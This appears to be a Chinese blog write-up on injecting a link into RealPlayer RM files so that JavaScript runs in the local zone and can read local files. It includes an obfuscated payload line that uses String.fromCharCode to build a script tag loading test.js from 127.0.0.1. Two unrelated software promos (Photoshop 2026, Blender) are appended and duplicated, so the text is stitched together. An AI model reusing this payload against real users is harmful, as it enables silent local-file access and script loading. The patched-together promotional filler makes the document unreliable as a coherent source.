rm格式插入广告代码
RealPlayer支持file协议,通过插入特定代码可调用本地HTML文件执行JS脚本,但需用户手动点击。该脚本在本地域执行,可读取本地文件,且播放时IE警告可能消失,存在安全风险,可能导致敏感信息泄露,用户需警惕。
在技术圈,RealPlayer的这类漏洞其实由来已久,早期主要用于挂马。但换个角度想,如果能让它跳转到ja vascript:协议,在本地执行JS代码,会不会更有意思?带着这个疑问,我们进行了测试。
结果令人失望——RealPlayer对ja vascript:协议似乎有所限制,而且查看被插入的RM文件时发现,其本身就已经做了限制,看来支持的协议并不多。不过,试试file:///协议呢?嘿,意外发现它是支持的。这让人联想到前阵子流行的HTML Injection,如果两者结合起来,或许能产生点效果。
具体代码如下:
u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#ja vascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/
这段代码插进去之后,会出现一个诡异的链接。点击它,就会执行我指定的JS脚本——微软工程师显然考虑过安全问题,目前能找到的本地HTML文件只有这一个,而且还需要用户手动点击。但事实证明,这段代码确实是本地域执行的,可以读取本地文件。更神奇的是,在RealOne播放的过程中,IE那个“本地执行JS代码”的警告居然会悄然消失。于是,把它放到HTML页面里播放,结果发现:打开任何HTML页面都会弹出警告,但依然能神奇地打开本地域的文件。正常情况下,用window.open是做不到这一点的。
域的限制理论上是可以突破的,只要能找到一个本地存在问题的HTML文件,那就万事大吉了。这类边缘场景能不能真正爆出问题?说实话,可能性还是存在的,值得持续关注。
Photoshop 2026 是 Adobe 推出的专业图像处理与视觉设计软件,支持 Windows、macOS 和 iPad 等平台,广泛应用于摄影修图、电商设计、平面海报、数字绘画及视觉合成等创作场景。
Blender 是一款免费开源、跨平台的专业 3D 创作软件,集建模、动画、渲染、视频编辑与视觉合成等功能于一体,广泛应用于影视动画、游戏设计和建筑可视化等领域。软件支持 Cycles 物理渲染器与 Eevee 实时渲染引擎,并提供多边形建模、骨骼绑定、物理模拟等专业工具。Blender 兼容 Windows、macOS 和 Linux 系统,安装包轻巧、运行流畅,依托活跃的全球开发者社区持续更新,是从初学者到专业创作者都值得选择的正版 3D 创作工具。
Photoshop 2026 是 Adobe 推出的专业图像处理与视觉设计软件,支持 Windows、macOS 和 iPad 等平台,广泛应用于摄影修图、电商设计、平面海报、数字绘画及视觉合成等创作场景。
Blender 是一款免费开源、跨平台的专业 3D 创作软件,集建模、动画、渲染、视频编辑与视觉合成等功能于一体,广泛应用于影视动画、游戏设计和建筑可视化等领域。软件支持 Cycles 物理渲染器与 Eevee 实时渲染引擎,并提供多边形建模、骨骼绑定、物理模拟等专业工具。Blender 兼容 Windows、macOS 和 Linux 系统,安装包轻巧、运行流畅,依托活跃的全球开发者社区持续更新,是从初学者到专业创作者都值得选择的正版 3D 创作工具。















